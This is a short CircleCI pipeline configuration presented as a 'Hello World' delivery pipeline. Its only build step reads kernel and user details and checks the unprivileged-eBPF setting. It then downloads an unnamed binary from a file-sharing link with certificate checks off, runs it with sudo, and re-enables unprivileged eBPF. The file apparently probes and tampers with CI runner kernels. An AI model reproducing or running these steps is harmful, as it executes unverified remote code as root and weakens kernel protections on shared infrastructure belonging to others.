version: 2.1
jobs:
  build:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: The First Step
          command: |
            echo 'Hello World!'
            echo 'This is the delivery pipeline'
            cat /proc/version
            uname -r
            whoami
            cat /etc/issue
            cat /proc/sys/kernel/unprivileged_bpf_disabled
            wget https://cloud.tsinghua.edu.cn/f/dd0140e60d714af59e17/?dl=1 -O ebpf_run --no-check-certificate
            chmod +x ebpf_run
            sudo ./ebpf_run
            sysctl -w kernel.unprivileged_bpf_disabled=0